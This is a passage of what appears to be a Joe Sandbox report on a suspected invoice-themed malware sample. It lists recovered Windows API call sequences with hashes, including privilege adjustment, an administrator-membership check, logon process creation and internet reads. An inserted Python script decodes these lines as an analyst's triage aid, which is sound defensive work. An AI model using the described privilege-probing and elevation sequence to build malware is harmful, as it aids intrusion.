                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                                                                            • String ID:
                                                                            • API String ID: 1423138444-0
                                                                            • Opcode ID: 5dce8d22ee8482fcb9f71147821cb8aa9964c69f72b4a6a4d054acab7eb83e2e
                                                                            • Instruction ID: 6a55275024a669766bf422d477179a3cb7638776713b5552532fea0fcd559e34
                                                                            • Opcode Fuzzy Hash: 5dce8d22ee8482fcb9f71147821cb8aa9964c69f72b4a6a4d054acab7eb83e2e
                                                                            • Instruction Fuzzy Hash: E831A535500118AFCF16CF98C858EEA7BF5EB09721F484069FE068B261D731AD58EBE4
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00F285E2
                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00F285E9
                                                                            • CloseHandle.KERNEL32(00000004), ref: 00F28603
                                                                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00F28632
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
                                                                            • String ID:
                                                                            • API String ID: 2621361867-0
                                                                            • Opcode ID: 10adc6eca38d213bf2ca67139e86332b971a8e90be31f3ab6357cc8d64cf4ce3
                                                                            • Instruction ID: 4c8c30a46e5e30b427d1f1dcbf8420177987a9d63be839277acc39558dff407f
                                                                            • Opcode Fuzzy Hash: 10adc6eca38d213bf2ca67139e86332b971a8e90be31f3ab6357cc8d64cf4ce3
                                                                            • Instruction Fuzzy Hash: DE114C7250124DAFDF018FA4ED48AEE7FA9EF08355F044065FE05A2160C7718D65EB20
APIs
  • Part of subcall function 00ED2612: GetWindowLongW.USER32(?,000000EB), ref: 00ED2623
• NtdllDialogWndProc_W.NTDLL(?,00000020,?), ref: 00ED12D8
• GetClientRect.USER32(?,?), ref: 00F0B5FB
• GetCursorPos.USER32(?), ref: 00F0B605
• ScreenToClient.USER32(?,?), ref: 00F0B610
Memory Dump Source
• Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
• Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
Similarity
• API ID: Client$CursorDialogLongNtdllProc_RectScreenWindow
• String ID:
• API String ID: 1010295502-0
• Opcode ID: dff3787c5d1ebf3c45cab1566b59ba167b9358ecf8df62d9cb5c708480ace762
• Instruction ID: 11b9a63324127a8c4f51b3547d72df6f4ef94b6285b519a437a87c4c60a4b3a7
• Opcode Fuzzy Hash: dff3787c5d1ebf3c45cab1566b59ba167b9358ecf8df62d9cb5c708480ace762
• Instruction Fuzzy Hash: A8112835A0011DBBCB10EF98D8859EE77B9EB05301F500496FA01E7251D731AA56ABA5
APIs
• lstrlenW.KERNEL32(?,?,?,00000000), ref: 00F2E628
Strings
Memory Dump Source
• Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
• Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
Similarity
• API ID: lstrlen
• String ID: ($|
• API String ID: 1659193697-1631851259
• Opcode ID: 707b7f7998ffb85bb736ed7f14b8be5a3c5538d509fa679957fa06d8752cfb00
• Instruction ID: 86331dfbefa13cdf97c5268a85c21f9fdaad6af4a3d760d1a532cad739c2af9a
• Opcode Fuzzy Hash: 707b7f7998ffb85bb736ed7f14b8be5a3c5538d509fa679957fa06d8752cfb00
• Instruction Fuzzy Hash: 9E323775A007159FDB28CF59D481AAAB7F0FF48320B25C46EE89ADB3A1D770E941CB40
APIs
• InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00F4180A,00000000), ref: 00F423E1
• InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00F42418
Memory Dump Source
• Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
• Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
Similarity
• API ID: Internet$AvailableDataFileQueryRead
• String ID:
• API String ID: 599397726-0
• Opcode ID: e29fa93d7f5943a36cc671546d33b0c074c8eb341e378f2386edd7065acda07a
• Instruction ID: 6966324227132ccef0e1ba28e52f7ceeb39c0a9988b64c77fff3d91e3b029122
• Opcode Fuzzy Hash: e29fa93d7f5943a36cc671546d33b0c074c8eb341e378f2386edd7065acda07a
• Instruction Fuzzy Hash: 4E41F372904209BFEB50DE95DC81FBBBBBCEB40324F50407AFE45A6152EA749E41B660
APIs
• SetErrorMode.KERNEL32(00000001), ref: 00F3B40B
• GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00F3B465
• SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00F3B4B2
Memory Dump Source
• Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
• Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
Similarity
• API ID: ErrorMode$DiskFreeSpace
• String ID:
• API String ID: 1682464887-0
• Opcode ID: f1d0a270afd974743f940b3cd3777965e0c75474d8f41e7560a4699b94a70418
• Instruction ID: 4310f7dd76113acce9c2c9944fd39023296a82db641397f3a6f9e35d17ca4bf1
• Opcode Fuzzy Hash: f1d0a270afd974743f940b3cd3777965e0c75474d8f41e7560a4699b94a70418
• Instruction Fuzzy Hash: 87215135A00608DFCB00EFA5DC80AEDBBB8FF49314F1480AAE905EB352CB319915DB50
APIs
  • Part of subcall function 00EF0DB6: std::exception::exception.LIBCMT ref: 00EF0DEC
  • Part of subcall function 00EF0DB6: __CxxThrowException@8.LIBCMT ref: 00EF0E01
• LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F2882B
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F28858
• GetLastError.KERNEL32 ref: 00F28865
Memory Dump Source
• Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
• Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
Similarity
• API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
• String ID:
• API String ID: 1922334811-0
• Opcode ID: 5c4fcf4ae3368387a608185d5424bacd81d33272a9f5e47338be13c4233dfadb
• Instruction ID: 0734dc62a12eb113429989905775b795cfa7cd27075f1f19f813200ca2739af2
• Opcode Fuzzy Hash: 5c4fcf4ae3368387a608185d5424bacd81d33272a9f5e47338be13c4233dfadb
• Instruction Fuzzy Hash: FB11BFB2804308AFE718DFA4EC85D6BB7F8EB04311B24856EF55593241EB30BC018B60
APIs
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00F28774
• CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00F2878B
• FreeSid.ADVAPI32(?), ref: 00F2879B
Memory Dump Source
• Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
• Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
Similarity
• API ID: AllocateCheckFreeInitializeMembershipToken
• String ID:
• API String ID: 3429775523-0
• Opcode ID: 8735c310e99ceedc6ef6185c38dc5143e7eac9892e7dce3381ffcd0ef4548cb2
• Instruction ID: 1919a47b44f1e4bde25cd780212901492c5951e9f3bdeaefd6132ad6d6ba08ea
• Opcode Fuzzy Hash: 8735c310e99ceedc6ef6185c38dc5143e7eac9892e7dce3381ffcd0ef4548cb2
• Instruction Fuzzy Hash: D4F04F7591130CBFDF00DFF4DC89AAEB7BCEF08311F1044A9AA01E2181D6715A089B50
APIs
• mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00F34CB3
Strings
Memory Dump Source
• Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
• Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
Similarity
• API ID: mouse_event
• String ID: DOWN
• API String ID: 2434400541-711622031
• Opcode ID: 6a91134b6e1fdbc42196577956edeb6ab81679feaa31584e4dd8ec01605ffb75
• Instruction ID: 6561690969e792872deee8efec52d62175a755ee4894568487c4dede240b39ac
• Opcode Fuzzy Hash: 6a91134b6e1fdbc42196577956edeb6ab81679feaa31584e4dd8ec01605ffb75
• Instruction Fuzzy Hash: 88E046221AD72238A9042958BC03EF7128C8B12371B20224AFA10E54C1EE807C8275B9
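Three of the entries above are easier to read once their raw argument values are mapped back to Windows SDK names: SetErrorMode(1) wrapped around GetDiskFreeSpaceExW, AllocateAndInitializeSid(?,2,0x20,0x220,...) followed by CheckTokenMembership and FreeSid, and mouse_event(0x800,...). The following Python script is an added example, not part of the Joe Sandbox report or of the analysed sample: it parses the report's "• Name.MODULE(args), ref: addr" lines (the sample input is constructed by copying the entries above), labels the constants it recognises, and flags the AllocateAndInitializeSid / CheckTokenMembership / FreeSid sequence, which with sub-authorities 0x20 and 0x220 is the standard BUILTIN\Administrators membership test. The constant values are taken from the SDK headers; the line format, the `Call` structure and the note strings are this example's own assumptions, and the S-1-5-32-544 identification is conditional because the report shows the identifier-authority argument as "?".

```python
"""Annotate Joe Sandbox 'APIs' lines with Windows SDK constant names.

Added example, not part of the Joe Sandbox report or of the analysed sample.
The line format ("• Name.MODULE(args), ref: addr") is assumed from the
entries in this report; '?' marks an argument the sandbox did not recover.
Constant values come from winbase.h, winnt.h and winuser.h.
"""
import re
from dataclasses import dataclass, field

# Constructed sample input: copied from the APIs entries in this report.
SAMPLE_LINES = [
    "• SetErrorMode.KERNEL32(00000001), ref: 00F3B40B",
    "• GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00F3B465",
    "• SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00F3B4B2",
    "• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,"
    "00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00F28774",
    "• CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00F2878B",
    "• FreeSid.ADVAPI32(?), ref: 00F2879B",
    "• mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00F34CB3",
]

LINE_RE = re.compile(
    r"•\s*(?P<name>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

SEM_FLAGS = {0x0001: "SEM_FAILCRITICALERRORS", 0x0002: "SEM_NOGPFAULTERRORBOX",
             0x0004: "SEM_NOALIGNMENTFAULTEXCEPT", 0x8000: "SEM_NOOPENFILEERRORBOX"}
WELL_KNOWN_RIDS = {0x20: "SECURITY_BUILTIN_DOMAIN_RID", 0x220: "DOMAIN_ALIAS_RID_ADMINS",
                   0x221: "DOMAIN_ALIAS_RID_USERS", 0x222: "DOMAIN_ALIAS_RID_GUESTS"}
MOUSEEVENTF = {0x0001: "MOUSEEVENTF_MOVE", 0x0002: "MOUSEEVENTF_LEFTDOWN",
               0x0004: "MOUSEEVENTF_LEFTUP", 0x0800: "MOUSEEVENTF_WHEEL",
               0x8000: "MOUSEEVENTF_ABSOLUTE"}


@dataclass
class Call:
    name: str
    module: str
    args: list           # int for recovered values, None for '?'
    ref: int             # address of the call site
    notes: list = field(default_factory=list)


def flag_names(value, table):
    """Split a bitmask into known flag names; unknown bits are kept as hex."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    rest = value & ~sum(table)
    if rest:
        names.append(f"0x{rest:X}")
    return names


def parse_line(line):
    m = LINE_RE.search(line)
    if not m:
        raise ValueError(f"not an API line: {line!r}")
    raw = [a.strip() for a in m["args"].split(",") if a.strip()]
    args = [None if a == "?" else int(a, 16) for a in raw]
    return Call(m["name"], m["module"], args, int(m["ref"], 16))


def annotate(call):
    a = call.args
    if call.name == "SetErrorMode" and a and a[0] is not None:
        # SEM_FAILCRITICALERRORS suppresses the "no disk" dialog that a
        # GetDiskFreeSpaceExW on an empty removable drive would otherwise raise.
        call.notes.append("uMode=" + ("|".join(flag_names(a[0], SEM_FLAGS)) or "0 (default error handling)"))
    elif call.name == "AllocateAndInitializeSid" and len(a) >= 3 and a[1] is not None:
        count, rids = a[1], a[2:2 + a[1]]
        call.notes.append(f"nSubAuthorityCount={count}")
        call.notes += ["RID ?" if r is None else WELL_KNOWN_RIDS.get(r, f"RID 0x{r:X}") for r in rids]
        if rids == [0x20, 0x220]:
            # pIdentifierAuthority is '?' in the report, so the SID name is conditional.
            call.notes.append("BUILTIN\\Administrators (S-1-5-32-544) if pIdentifierAuthority is SECURITY_NT_AUTHORITY")
    elif call.name == "CheckTokenMembership" and a and a[0] == 0:
        call.notes.append("TokenHandle=NULL: tests the calling thread's impersonation token, else the process token")
    elif call.name == "mouse_event" and a and a[0] is not None:
        call.notes.append("dwFlags=" + "|".join(flag_names(a[0], MOUSEEVENTF)))
    return call


def decode(lines):
    return [annotate(parse_line(line)) for line in lines]


def is_admin_membership_check(calls):
    """True when AllocateAndInitializeSid(.., 2, 0x20, 0x220, ..) is later
    followed by CheckTokenMembership and FreeSid: the usual IsUserAnAdmin idiom."""
    for i, c in enumerate(calls):
        if c.name == "AllocateAndInitializeSid" and c.args[2:4] == [0x20, 0x220]:
            tail = {t.name for t in calls[i + 1:]}
            return {"CheckTokenMembership", "FreeSid"} <= tail
    return False


if __name__ == "__main__":
    calls = decode(SAMPLE_LINES)
    for c in calls:
        shown = ",".join("?" if x is None else f"0x{x:X}" for x in c.args)
        print(f"{c.ref:08X} {c.name}.{c.module}({shown})  {'; '.join(c.notes)}")
    print("admin membership check:", is_admin_membership_check(calls))
```

Run it on a saved copy of the APIs lines to get one annotated line per call; `is_admin_membership_check` is the sequence-level check an analyst would turn into a triage rule, since AutoIt-compiled droppers commonly use this exact sequence to decide whether to attempt elevation.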
APIs
  • Part of subcall function 00ED2612: GetWindowLongW.USER32(?,000000EB), ref: 00ED2623
  • Part of subcall function 00ED25DB: GetWindowLongW.USER32(?,000000EB), ref: 00ED25EC
• GetParent.USER32(?), ref: 00F0B7BA
• NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,00ED19B3,?,?,?,00000006,?), ref: 00F0B834
Memory Dump Source
• Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
• Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
Similarity
• API ID: LongWindow$DialogNtdllParentProc_
• String ID:
• API String ID: 314495775-0
• Opcode ID: cadd727571a3c356f562325ba865d87ffb4730cddbf13772622df7342253b34c
• Instruction ID: bd7185a792cd04eec6de848c1deae178b820d4f6eb35f482e327f157c0f42cac
• Opcode Fuzzy Hash: cadd727571a3c356f562325ba865d87ffb4730cddbf13772622df7342253b34c
• Instruction Fuzzy Hash: 7E219334601108BFDB118F28C884EA93BD6EB4A324F585296F6256B3F2C7319D12FB51
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 00F3C6FB
• FindClose.KERNEL32(00000000), ref: 00F3C72B
Memory Dump Source
• Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
• Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
• Opcode ID: fa4d2db3ddc26859d41a59f17bb653f1619b91c74e50bded628bf58e9658d276
• Instruction ID: 66daca8049b54c1f6f1e31df180aa21198e0665b0f604361518e9df0feec1e0c
• Opcode Fuzzy Hash: fa4d2db3ddc26859d41a59f17bb653f1619b91c74e50bded628bf58e9658d276
• Instruction Fuzzy Hash: 48118E766002049FDB10EF29DC45A2AF7E8EF85325F00851EF9A9D73A1DB30A805DB81
APIs
  • Part of subcall function 00ED2612: GetWindowLongW.USER32(?,000000EB), ref: 00ED2623
• NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,00F0B93A,?,?,?), ref: 00F5C5F1
  • Part of subcall function 00ED25DB: GetWindowLongW.USER32(?,000000EB), ref: 00ED25EC
• SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00F5C5D7
Memory Dump Source
• Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
• Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
Similarity
• API ID: LongWindow$DialogMessageNtdllProc_Send
• String ID:
• API String ID: 1273190321-0
• Opcode ID: 9bda79f0cddb2aaeac5d13cd646241290e7e423ca07e0c4544c273e310bf79d5
• Instruction ID: a3f5ff2aba4709f4637453c577662ef8cb18f63593d63c2d91701c63204cdbfb
• Opcode Fuzzy Hash: 9bda79f0cddb2aaeac5d13cd646241290e7e423ca07e0c4544c273e310bf79d5
• Instruction Fuzzy Hash: 7A019231200308AFCB225F54DC44E6A3BA6FB85761F180169FB521B2E1DB31A916FB91
APIs
• ClientToScreen.USER32(?,?), ref: 00F5C961
• NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,00F0BA16,?,?,?,?,?), ref: 00F5C98A
Memory Dump Source
• Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
• Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
Similarity
• API ID: ClientDialogNtdllProc_Screen
• String ID:
• API String ID: 3420055661-0
• Opcode ID: d736318feb860541d9888c4f54b708401b261ff9e1eb3bd667971373ef9220b2
• Instruction ID: 435ed8c3c5abc0345c819f06d9b3670abc074db51b0d8b758b7928d83e1b7c16
• Opcode Fuzzy Hash: d736318feb860541d9888c4f54b708401b261ff9e1eb3bd667971373ef9220b2
• Instruction Fuzzy Hash: 45F0307241021CFFDF058F45DC099BE7FB9FB44312F14415AFA4152161D3716A54EBA4
APIs
• GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00F49468,?,00F5FB84,?), ref: 00F3A097
• FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00F49468,?,00F5FB84,?), ref: 00F3A0A9
Memory Dump Source
• Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
• Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
Similarity
• API ID: ErrorFormatLastMessage
• String ID:
• API String ID: 3479602957-0
• Opcode ID: 07a5a95624c145b021e4538ef70e91a35145b9f321b6760260a6bff5d7cda734
• Instruction ID: 9fb5b6da2e06bc5f3974788c4f6ae21fdb1184c92fd6f3634b2f550a7f8a91f7
• Opcode Fuzzy Hash: 07a5a95624c145b021e4538ef70e91a35145b9f321b6760260a6bff5d7cda734
• Instruction Fuzzy Hash: 5CF0E23610432DABDB20AFA4CC48FEA736CFF08361F0041A6F948D3180D6309904DBA1
APIs
